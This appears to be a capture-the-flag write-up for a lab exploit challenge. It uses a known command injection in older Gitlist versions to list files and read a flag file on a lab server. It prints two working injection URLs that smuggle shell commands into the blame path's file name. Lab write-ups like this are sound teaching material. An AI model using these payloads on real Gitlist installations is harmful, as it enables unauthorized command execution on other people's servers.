Category: Exploit Points: 300 Description:
People say that if you're still angry at 80, you're not an angry young man, just a grumpy old git. 10.13.37.33
Hint: gitlist.
Taking the hint, we navigate to http://10.13.37.33/gitlist/ which hosts a Gitlist instance. Older versions of Gitlist are vulnerable to remote command execution. Let’s try executing ls -al on the target server:
http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60
It works! After some recon work, we find a file named e3.flag in the server root. Let’s view its contents using the following payload:
http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60cat%20%2Fe3.flag%60
The result is:
stupid psychopathic git.
This is the flag.
- none yet